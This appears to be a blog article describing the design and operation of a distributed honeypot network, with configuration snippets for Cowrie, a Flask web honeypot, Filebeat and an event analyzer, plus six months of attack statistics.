
Honeypots are one of the most valuable tools in a security researcher's arsenal. They provide real-world attack data that no simulation can replicate. Over the past year, we've built and operated a distributed honeypot network spanning multiple cloud providers and geographic regions.
This article shares our architecture, implementation details, and the lessons we learned along the way.
Before diving into the technical details, let's address the "why":
"The best way to understand your adversary is to watch them work."
Our network consists of three main components:
┌─────────────────────────────────────────────────────────────┐
│ Central Analysis Server │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────────────┐ │
│ │ Elasticsearch│ │ Kibana │ │ Custom Analyzers │ │
│ └─────────────┘ └─────────────┘ └─────────────────────┘ │
└─────────────────────────────────────────────────────────────┘
▲
│ Encrypted Tunnel
│
┌─────────────────────────┼─────────────────────────┐
│ │ │
▼ ▼ ▼
┌─────────┐ ┌─────────┐ ┌─────────┐
│ AWS │ │ GCP │ │ Azure │
│ Region │ │ Region │ │ Region │
│ Sensors │ │ Sensors │ │ Sensors │
└─────────┘ └─────────┘ └─────────┘
Our design followed several key principles:
We deployed a variety of honeypot types to capture different attack vectors:
| Type | Purpose | Implementation |
|---|---|---|
| SSH | Brute force attacks, credential harvesting | Cowrie |
| Web | Application attacks, vulnerability scanning | Custom Flask app |
| Database | SQL injection, unauthorized access | MySQL honeypot |
| SMB | Ransomware, lateral movement | Dionaea |
| IoT | Botnet recruitment, default credentials | Custom |
Cowrie is our workhorse for SSH honeypots. We customized it extensively:
# Custom Cowrie configuration
class HoneypotConfig:
# Fake filesystem with realistic structure
FILESYSTEM = "/opt/cowrie/honeyfs/realistic_ubuntu.pickle"
# Simulated commands with realistic output
COMMANDS = {
"uname -a": "Linux prod-web-01 5.4.0-42-generic #46-Ubuntu SMP x86_64",
"cat /etc/passwd": FAKE_PASSWD_CONTENT,
"ps aux": generate_fake_processes(),
}
# Credential acceptance rules
def should_accept_login(self, username, password):
# Accept common default credentials
if (username, password) in COMMON_DEFAULTS:
return True
# Random acceptance for others (creates realistic failure rates)
return random.random() < 0.15
Our web honeypot simulates vulnerable applications:
from flask import Flask, request
import logging
app = Flask(__name__)
# Simulated WordPress login
@app.route('/wp-login.php', methods=['GET', 'POST'])
def wordpress_login():
log_attack({
'type': 'wordpress_login',
'method': request.method,
'credentials': {
'user': request.form.get('log'),
'pass': request.form.get('pwd')
},
'headers': dict(request.headers),
'ip': request.remote_addr
})
return render_template('wp-login.html'), 200
# Simulated SQL injection endpoint
@app.route('/products')
def products():
product_id = request.args.get('id', '')
if contains_sqli(product_id):
log_attack({
'type': 'sql_injection',
'payload': product_id,
'ip': request.remote_addr
})
# Return fake "successful" injection response
return fake_sqli_response(product_id)
return render_template('products.html')
All honeypots forward logs to our central Elasticsearch cluster:
# Filebeat configuration
filebeat.inputs:
- type: log
paths:
- /var/log/cowrie/cowrie.json
json.keys_under_root: true
json.add_error_key: true
fields:
honeypot_type: ssh
region: us-east-1
output.elasticsearch:
hosts: ["https://analysis.internal:9200"]
ssl.certificate_authorities: ["/etc/pki/ca.crt"]
index: "honeypot-%{+yyyy.MM.dd}"
We process events in real-time using custom analyzers:
class AttackAnalyzer:
def __init__(self):
self.redis = Redis()
self.threat_intel = ThreatIntelAPI()
async def process_event(self, event):
# Enrich with threat intelligence
event['threat_intel'] = await self.threat_intel.lookup(event['ip'])
# Check for known attack patterns
if patterns := self.detect_patterns(event):
event['attack_patterns'] = patterns
await self.alert_if_critical(event)
# Track attack campaigns
campaign_id = self.correlate_campaign(event)
if campaign_id:
event['campaign_id'] = campaign_id
return event
After 6 months of operation, we observed:
| Metric | Value |
|---|---|
| Total attacks logged | 12.4 million |
| Unique source IPs | 890,000+ |
| Countries represented | 195 |
| Malware samples captured | 15,000+ |
| Zero-days identified | 3 |
Attack sources by region:
SSH (22) ████████████████████████████ 45%
HTTP (80) ████████████████████ 32%
HTTPS (443) ██████████ 15%
MySQL (3306) ████ 5%
Others ██ 3%
Early versions of our honeypots were quickly identified by attackers. We learned that:
High-interaction honeypots are resource-intensive. We implemented:
class ResourceLimiter:
MAX_SESSIONS_PER_IP = 5
MAX_BANDWIDTH_PER_SESSION = 100 * 1024 # 100KB/s
MAX_SESSION_DURATION = 3600 # 1 hour
def should_allow_connection(self, ip):
current_sessions = self.get_session_count(ip)
return current_sessions < self.MAX_SESSIONS_PER_IP
Operating honeypots comes with legal responsibilities:
We're planning several enhancements:
Building a honeypot network is a significant undertaking, but the intelligence gathered is invaluable. The key is balancing authenticity with operational security, and maintaining the infrastructure over time.
For organizations considering their own deployment, start small with low-interaction honeypots and expand as you build expertise.
If you're interested in honeypot data for research purposes, feel free to reach out through the contact page.